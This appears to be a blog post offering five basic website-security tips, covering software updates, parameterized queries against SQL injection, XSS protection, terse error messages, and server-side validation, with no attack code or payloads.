You may think that your site is of no interest to hackers, but attacks on such “uninteresting” sites happen all the time. Most of them are not aimed at stealing your data. Instead, attackers are trying to use your server as an intermediary to send spam e-mails or to set up a temporary web server (to serve illegal files).
Other ways to use compromised machines are to use your servers as part of a botnet or to mine cryptocurrencies. Your site can also be attacked by a blackmailer program.
Hacking is regularly carried out by automated scripts written to scour the Internet in an attempt to exploit known software security problems.
Here are five tips that you can follow to better protect your site
Contents
1. Update the software :
It may seem obvious, but updating all software is vital to keeping your site secure. And this applies both to the server operating system and any software you run on your site, such as a CMS or forum. When holes in your site’s security are discovered, hackers will quickly begin attempting attacks.
If you’re using managed hosting, you don’t have to worry too much about security updates for your operating system, as this is handled by the hosting company.
If you use third-party software on your site, such as a CMS or forum, you should keep an eye out for security patches and apply them regularly.
Most vendors have a newsletter or RSS where they report any security issues. WordPress, Umbraco, and many other CMSes notify you of updates every time you log in.
2. Watch out for possible SQL injection :
SQL injection is an attacker’s use of a form field or URL parameter to gain access to your database. If you use standard Transact SQL, it is easy for attackers to discreetly insert non-standard code into your query, which will then be used to change tables, retrieve information, and delete data.
This can easily be prevented by always using parameterized queries. Most web languages have this functionality, and it’s easy to use.
If you’re looking to break into (Cross-site scripting), we suggest checking out :▷ Protecting your users against cross-site scripting
3. Protection against XSS attacks :
Cross-site scripting (XSS) injects malicious JavaScript code into your pages, which then runs in your users’ browsers. It can modify the page content, steal information and send it to the attacker.
For example, if you display comments on a website page without verifying them, an attacker could leave a comment containing the script tags and JavaScript code. This code would be able to run in the browser of every user on your site and steal the login cookie.
This will allow the attacker to control all the accounts of users who view the page with his comment. You need to make sure that users cannot insert active JavaScript content into your pages.
This is especially true of modern web applications. They create pages mostly from user-generated content, and in many cases they also generate HTML code that is then also interpreted by frontend frameworks like Angular and Ember.
These frameworks provide protection against XSS, but mixing server-side and client-side rendering creates opportunities for new, more sophisticated attacks.
If you’re looking to break into (Protection against XSS attacks), we suggest checking out :▷ What is cross-site scripting (XSS)?
4. pay attention to error messages
Be careful about how much information you give out in your bug reports. Only provide the bare minimum to your users, so that you don’t leak sensitive data from your server (e.g., API keys or database passwords).
Also, don’t provide details about exceptions, as they can make more sophisticated attacks, such as SQL injection, much easier.
5. Do both backend and frontend validation
Validation should always be done on both parts. The browser can catch simple things like incomplete form fields and entering text into the number field. But this check can be bypassed, so deeper server-side validation is required.
Lack of such validation can lead to malicious code getting into your database and undesirable site behavior.
More resources :
